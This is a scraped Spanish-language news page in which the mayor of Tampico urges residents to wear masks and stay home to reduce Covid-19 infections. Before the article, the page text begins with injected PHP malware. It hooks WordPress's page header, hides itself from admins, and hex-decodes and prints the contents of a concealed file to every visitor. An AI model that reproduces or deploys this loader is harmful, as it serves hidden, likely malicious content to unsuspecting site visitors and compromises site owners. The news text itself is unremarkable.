if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Indispensable la participación ciudadana para bajar los contagios: Chucho Nader – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Indispensable la participación ciudadana para bajar los contagios: Chucho Nader

Indispensable la participación ciudadana para bajar los contagios: Chucho Nader

Tampico, Tamaulipas.- A pesar de que en los últimos días la Secretaría de Salud informa una notable disminución en los contagios por Covid-19 en Tamaulipas, Jesús Nader Nasrallah, alcalde de Tampico, señaló que es indispensable la participación de la ciudadanía para bajar más los casos positivos en la zona sur de Tamaulipas.

Chucho Nader, comentó que es necesario primero que las personas que no tienen nada que hacer en la calle, en alguna tienda de autoservicio o en el centro de la ciudad, se queden en casa.

«Y si por alguna urgencia tienen que salir a la calle o quienes trabajan, deben usar el cubrebocas, importante para bajar la cantidad de contagios, ayudar al sistema de Salud para que no se saturen los hospitales y que el personal médico sea suficiente», dijo.

Comentó que nuestra zona tiene un dinamismo grande por su cercanía con el norte de Veracruz, señalando que tan solo en los cruces de lancha, pasan 35 mil personas diariamente en ambas direcciones, siendo ese sector en el que se detectan mayores casos de Covid-19.

Dijo que donde más casos se han detectado es a gente relacionada con el primero y segundo cuadro de la ciudad, la colonia Tamaulipas y la colonia Morelos.

Insistió en que toda la población debe usar cubrebocas ya que eso, junto con la sana distancia y el constante lavado o higiene de manos, ayudarán a reducir los contagios.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas